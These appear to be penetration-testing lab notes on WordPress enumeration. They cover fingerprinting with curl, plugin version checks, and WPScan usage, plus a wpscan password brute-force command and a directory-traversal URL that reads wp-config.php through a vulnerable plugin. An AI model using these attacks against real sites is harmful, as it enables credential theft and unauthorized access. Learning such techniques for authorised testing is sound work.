WordPress
Manual WordPress enumeration
Browse to the robots.txt file to identify a WordPress site. On a WordPress site the file typically looks like this:
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/
Sitemap: https://inlanefreight.local/wp-sitemap.xml
Interesting files and folders:
wp-content/plugins
Plugins are stored here
wp-content/themes
Themes are stored in this directory
# Identify WordPress
curl -s http://blog.inlanefreight.local | grep WordPress
<meta name="generator" content="WordPress 5.8" />
# Metasploit module to enumerate valid WordPress usernames
use auxiliary/scanner/http/wordpress_login_enum
Identify Themes
curl -s http://blog.inlanefreight.local/ | grep themes
Identify Plugins
curl -s http://blog.inlanefreight.local/ | grep plugins
Identify the plugins version
Browse to the identified plugin's directory (e.g.: http://blog.inlanefreight.local/wp-content/plugins/mail-masta/)
Identify readme.txt and extract version number and any other helpful information from it
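The manual checks above (generator tag, theme and plugin paths, readme.txt version) can be combined into one pass over HTML you have already fetched, which is handy for reviewing what your own site discloses. This is an added example, not part of the original notes; the function names are hypothetical and the sample HTML and readme are constructed (only mail-masta and the hostname come from the page).

```bash
#!/usr/bin/env bash
# Added example: summarise what a WordPress front page discloses.
# SAMPLE_HTML and SAMPLE_README are constructed; "example-theme" and
# "example-forms" are made-up names used only for illustration.
SAMPLE_HTML='<html><head>
<meta name="generator" content="WordPress 5.8" />
<link href="http://blog.inlanefreight.local/wp-content/themes/example-theme/style.css" />
<link href="http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/subscriber.css" />
<script src="http://blog.inlanefreight.local/wp-content/plugins/example-forms/js/front.js"></script>
<script src="http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/subscriber.js"></script>
</head></html>'

SAMPLE_README='=== Example Forms ===
Requires at least: 4.0
Stable tag: 1.2.3'

# Print "generator=<version>" for each generator meta tag in the HTML on stdin.
wp_generator() {
  grep -oE '<meta name="generator" content="WordPress [0-9.]+"' \
    | sed -E 's/.*WordPress ([0-9.]+)"/generator=\1/' | sort -u
}

# Print "<kind>=<slug>" once per unique wp-content/<kind>/<slug>/ reference.
# $1 is "plugins" or "themes".
wp_slugs() {
  grep -oE "wp-content/$1/[A-Za-z0-9._-]+/" \
    | sed -E "s#wp-content/$1/([^/]+)/#$1=\1#" | sort -u
}

# Full disclosure summary for the HTML on stdin; prints nothing if no markers.
wp_disclosure() {
  _html=$(cat)
  printf '%s\n' "$_html" | wp_generator
  printf '%s\n' "$_html" | wp_slugs themes
  printf '%s\n' "$_html" | wp_slugs plugins
}

# Extract the "Stable tag" version from a plugin readme.txt on stdin.
readme_version() {
  sed -nE 's/^[[:space:]]*Stable tag:[[:space:]]*([^[:space:]]+).*/\1/p' | head -n 1
}

# Against a live site you would pipe `curl -s <url>` into wp_disclosure instead.
printf '%s\n' "$SAMPLE_HTML" | wp_disclosure
printf 'readme_version=%s\n' "$(printf '%s\n' "$SAMPLE_README" | readme_version)"
```

Every line it prints is information an unauthenticated visitor can read; removing the generator tag and keeping the listed plugins and themes patched reduces what that information is worth.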
Enumerating users
Attacks
# Perform brute force attack to crack WordPress password. Uses common passwords from a predefined list.
wpscan --url http://172.25.210.128 -U psychotic_animal -P /usr/share/seclists/Passwords/xa
# Directory traversal on a vulnerable wordpress plugin. This approach uses the 'ebook-download' plugin to access sensitive files.
http://www.cpent.com/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
WPScan
WPScan identifies the WordPress version, plugins, themes and vulnerabilities automatically, and much faster than doing so manually:
Enumeration
Use WPScan with an API token to get the vulnerabilities for what it identifies. You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
# Enumerate everything
wpscan --url http://blog.inlanefreight.local/ --enumerate --api-token <SNIP>
WordPress Security Scanner by the WPScan Team
Version 3.8.28
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://blog.inlanefreight.local/ [10.129.1.169]
[+] Started: Wed Oct 15 05:16:04 2025
Identify themes/plugins
# Use the API token for authenticated scanning of WordPress plugins.
wpscan --url http://172.25.210.128 --api-token <API Token Here>
# Enumerate WordPress plugins on the given URL to identify potential vulnerabilities.
wpscan --url http://www.cpent.com --enumerate p
wpscan --url http://www.cpent.com --enumerate t
Note down all interesting findings from your enumeration phase before starting the exploitation phase.